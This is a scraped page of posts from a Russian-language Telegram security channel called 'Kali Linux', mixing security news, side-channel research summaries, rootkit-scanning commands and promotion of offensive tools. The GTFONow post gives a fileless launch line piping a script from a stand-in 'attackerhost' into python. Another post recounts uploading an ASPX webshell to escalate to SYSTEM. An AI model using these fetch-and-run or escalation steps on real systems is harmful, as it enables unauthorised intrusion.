Kali Linux
40.4K subscribers
693 photos
19 videos
12 files
774 links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl - 🐍

@ArtificialIntelligencedl - AI
Download Telegram
🖥 Где изучать Linux в 2024. Бесплатные курсы, книги и ресурсы

Видео
Статья

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 Получение мостов tor из GMail с помощью Python

Учите Python, он везде)
1 шаг — установка внешних библиотек
pip install python-decouple opencv-python pyzbar IMAPClient
decouple — для чтения данных из файла
opencv — для чтения изображения с QR-кодом
pyzbar — чтобы прочитать данные, закодированные в QR-коде
IMAPClient — с помощью неё будем работать с сообщениями на почтовом сервере

Так как мы будем использовать пароль приложений, а также логин от аккаунта Google, то в коде его желательно не использовать. Поэтому, необходимо создать файл «.env» с примерным содержимым:
login = "test@gmail.com"
pwd = "gffg sbbp jccj vhhi"


2 шаг — импорт библиотек

3 шаг — считывание данных из QR-кода

4 шаг — отправка письма

5 шаг — чтение почты

▶️ Полностью о каждом шаге можно прочитать тут

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Windows Matrix UHD.png
3.6 MB
💻 Держите, дерево всевозможных аттак на Windows

На вскидку здесь их 200+, не считал
Всё удобненько сгруппировано, чтобы можно было сориентироваться и сразу понять, как...
...тестировать свою Windows, а иначе для чего это всё
Ну вы понимаете)

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 Инфраструктурный пентест по шагам: сканирование и получение доступа

Годная статья, в которой описываются разные техники повышения привилегий и закрепления в системе.

Например, вот так рассказывается, как получить доступ на запись в папку веб-сервера.
— «На одном из недавних проектов мы обнаружили возможность записывать данные в папку веб-сервера IIS без авторизации. Мы сделали ASPX-файл, загрузили его на сервер и обратились к нему через браузер. Таким образом мы получили возможность исполнять команды в рамках контекста веб-сервера, а он, так же, как MS SQL, имеет привилегию имперсонализации. Мы сделали имперсонализацию и поднялись до системных привилегий. Создали себе учетную запись, зашли на этот веб-сервер через парадную дверь и начали продвигаться по инфраструктуре.»

В целом в статье довольно много полезностей, рекомендую

📎 Статья

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
13 марта 2013 года был выпущен Kali Linux

С прошедшим днем рождения любимый дистрибутив хакеров 🎂 👾

@linuxkalii
💻 Новые WebTunnel мосты Tor имитируют HTTPS-трафик

Разработчики Tor Project объявили о запуске новой функции — мостов WebTunnel, которые работают на основе устойчивого к обнаружению HTTPT-прокси и позволяют трафику Tor лучше смешиваться с обычным HTTPS-трафиком.

🗄Напомним, что мосты Tor представляют собой ретрансляторы, не перечисленные в публичном каталоге Tor, которые позволяют маскировать соединения пользователей. Так как уже довольно давно найдены способы обнаружения и блокировки таких соединения (например, в Китае), Tor также использует мосты obfsproxy, которые добавляют дополнительный уровень обфускации.

🗄Как рассказывают разработчики, мосты WebTunnel предназначены для имитации зашифрованного трафика (HTTPS) и основаны на HTTPT. Они оборачивают полезную нагрузку соединения в WebSocket-подобное HTTPS-соединение, которое выглядит как обычный HTTPS (WebSocket).То есть для стороннего наблюдателя это обычное HTTP-соединение, в ходе которого пользователь просто просматривает веб-страницы.

🗄Отмечается, что тестирование WebTunnel началось еще в летом 2023 года. В настоящее время по всему миру работают около 60 мостов WebTunnel, и около 700 активных пользователей ежедневно используют новые мосты на разных платформах. Однако пока WebTunnel работает не во всех регионах, а адрес мостов нужно получать вручную, что планируют доработать в будущем.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
💻 В этом посте поговорим об инструменте `GTFONow`

Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.

Основные особенности:
🗄Автоматическая эксплуатация неправильно настроенных разрешений sudo.
🗄Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
🗄Автоматическая эксплуатация неправильных настроенных компонентов ОС.
🗄Автоматическая эксплуатация через SSH‑ключи.
🗄Автоматическая эксплуатация через файл используемый в cron.
🗄Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
🗄Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python

🖥 GTFONow

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
😠 Bloodhound - набор аналитических инструментов с открытым исходным кодом (OSINT), предназначенных для отслеживания жертв торговли людьми и различных правонарушителей.

Все инструменты и ссылки бесплатны и постоянно обновляются.

🔗 https://colliertr.github.io/OSINT-dashboard/

#OSINT #OSINT4Good

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Информационная безопасность
⚠️ Российские хакеры APT 28 запустили масштабные фишинговые атаки, нацеленные на правительства и неправительственные организации по всей Европе, Северной и Южной Америке и Азии.

В этих атаках используются поддельные документы и письма, которые выглядят официальными.

Подробнее: https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html

#кибербезопасность

Hacking
🚨 Обнаружена критическая ошибка в плагинах miniOrange для WordPress.

Если вы используете miniorange сканер вредоносных программ (≤ 4.7.2) или брандмауэр веб-приложений (≤ 2.1.1), НЕМЕДЛЕННО УДАЛИТЕ ИХ.

Уязвимость позволяет злоумышленникам завладеть вашим сайтом.


Подробнее: https://thehackernews.com/2024/03/wordpress-admins-urged-to-remove.html

@linuxkalii
💻 Подглядывание с помощью датчика освещенности

🗄Американские исследователи опубликовали в журнале Science статью, в которой описан нетривиальный метод подглядывания за пользователем с помощью встроенного датчика освещенности. Такое устройство установлено абсолютно во всех смартфонах и планшетах, многих ноутбуках и телевизорах. Его основная задача — реагировать на изменение освещенности и соответственно изменять яркость дисплея.

🗄Но для начала необходимо пояснить, зачем использовать плохо подходящий для записи изображения инструмент, когда в любом смартфоне можно воспользоваться обычной камерой? Дело в том, что такие «плохо подходящие» датчики обычно никак не защищены. Представим себе, что атакующий уговорил пользователя установить на смартфон вредоносную программу. Получить доступ к очевидно небезопасным системам, таким как микрофон или фотокамера, ей будет достаточно непросто, а вот к датчику освещенности — пожалуйста, сколько угодно.

🗄Датчик освещенности — штука довольно примитивная. Это светочувствительный фотоэлемент, с помощью которого несколько раз в секунду измеряется яркость освещения. Этот датчик можно назвать самой примитивной цифровой фотокамерой в мире: ее разрешение составляет ровно 1 пиксель.

🗄Фоторезистор, «однопиксельный фотоаппарат», измеряет, как меняется отраженный от предметов свет. На основе этих данных создается фотография предметов. Качество такого изображения будет невысокое, и измерений надо провести много — сотни или тысячи.

🗄 Читать подробнее

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров

🗄Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.

🗄aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.

🗄В конце января 2024 года aiohttp обновилась до версии 3.9.2, в которой устранили уязвимость CVE-2024-23334. Это path traversal баг, затрагивающий все версии aiohttp (начиная с 3.9.1) и старше, который позволяет удаленным злоумышленникам без авторизации получить доступ к файлам на уязвимых серверах.

🗄Проблема связана с недостаточной проверкой при установке follow_symlinks в значение True для статичных маршрутов, что позволяет получить несанкционированный доступ к файлам за пределами статичного корневого каталога сервера.

🗄В конце февраля текущего года на GitHub появился PoC-эксплоит для CVE-2024-23334, а в начале марта на YouTube было опубликовано подробное видеоруководство по эксплуатации бага.

🗄Как теперь сообщают аналитики компании Cyble, их сканеры обнаруживают попытки эксплуатации CVE-2024-23334 начиная с 29 февраля, и атаки лишь усилились в марте. В основном попытки сканирования исходят с пяти IP-адресов, один из которых ранее был отмечен в отчете Group-IB и связан с вымогательской группировкой ShadowSyndicate.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 PrintListener: удаленная кража отпечатков пальцев

🗄Недавно исследователи из США и Китая опубликовали работу в которой предложили крайне необычный способ кражи отпечатков пальцев. Представьте, что вам звонит злоумышленник. Во время звонка вы что-то делаете на телефоне, естественно, водя пальцем по экрану. Звук от такого движения хорошо слышен через встроенные в смартфон микрофоны, а значит, потенциальный злоумышленник может этот звук записать и проанализировать. А из него воссоздать какие-то фрагменты отпечатка, которых будет достаточно, чтобы с помощью «искусственного пальца» разблокировать ваш смартфон.
Только вдумайтесь: из каких-то «шорохов» можно вычислить рисунок на подушечке пальца, это фантастически красивая атака по сторонним каналам!

🗄Когда пользователь водит по поверхности экрана пальцем, он производит практически не слышимый человеческим ухом шум. Эти, грубо говоря, «шорохи» неоднородны — их характер меняется, когда к экрану прикасаются крупные узлы в рисунке отпечатка, так называемые «петли» и «дуги». Если записать шум при помощи чувствительного микрофона, а позже проанализировать его, то на основании полученных данных можно восстановить примерное расположение и рисунок таких узлов.

🗄Всего в эксперименте приняло участие 65 добровольцев, было просканировано 180 пальцев. Эти данные были обработаны алгоритмом машинного обучения. Обученный алгоритм смог достаточно уверенно предсказывать некоторые характеристики отпечатка исключительно по звуку движения пальца по поверхности смартфона.

📎 Читать подробнее

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 Поиск руткитов в Kali (и не только) с помощью Chrootkit и Rkhunter

Руткит — это вредоносная программа, которая позволяет неавторизованному пользователю (читай злоумышленнику) получить доступ к системе и ее ограниченному программному обеспечению.

В этом посте мы поговорим о 2 самых известных программах с открытым исходным кодом — chkrootkit и rkhunter. Мы можем установить их в Kali Linux или любой другой дистрибутив Linux и проверить наш компьютер на наличие руткитов.


🗄Chkrootkit

chkrootkit — это простая программа, которая может гарантировать, что наш Kali Linux не был заражен. Мы также можем запустить chkrootkit на других дистрибутивах Linux, установив его на эти системы.

Ставится chkrootkit очевидным образом:
sudo apt install chkrootkit

Для проверки на наличие руткитов нужно просто запустить chkrootkit:
sudo chkrootkit


🗄Rkhunter (Охотник за руткитами)

rkhunter — это инструмент на базе Linux/Unix для сканирования возможных руткитов, бэкдоров и локальных эксплойтов.

Для этого он сравнивает SHA-1 хэши важных файлов с известными хорошими файлами в онлайн-базах данных, ищет каталоги по умолчанию (руткитов), неправильные разрешения, скрытые файлы, подозрительные строки в модулях ядра и специальные тесты для Linux.

Он не поставляется предустановленным в Kali Linux, поэтому:
sudo apt install rkhunter

После установки мы можем запустить rkhunter для сканирования всей нашей системы:
sudo rkhunter -c

Также сохраняет выходной файл журнала в /var/log/rkhunter.log

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🖥 GitHub начала тестирование системы Code Scanning Autofix для обработки оповещений об уязвимостях в коде

🗄GitHub тестирует систему Code Scanning Autofix, которая сканирует код, обнаруживает в нём уязвимости и предлагает исправления. Пока поддерживается проверка кода на JavaSript, Python, TypeScript и Java.

🗄Система работает на базе CodeQL и GitHub Copilot. Code Scanning Autofix обнаруживает ошибки, подсвечивает их, объясняет на естественном языке и предлагает исправленный вариант. Разработчик может принять предложение или попробовать всё исправить самостоятельно. Система может вносить правки сразу в несколько файлов, если ошибка выходит за пределы текущего файла.

🗄Инструмент в тестовом режиме доступен клиентам GitHub Advanced Security. Отмечается, что система в 7 раз ускоряет поиск уязвимостей и ошибок в коде. Кроме того, это добавляет дополнительный слой безопасности. Сперва разработчики проверяют код в IDE, а потом Code Scanning Autofix ещё сканирует его в GitHub.

🗄 Youtube

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM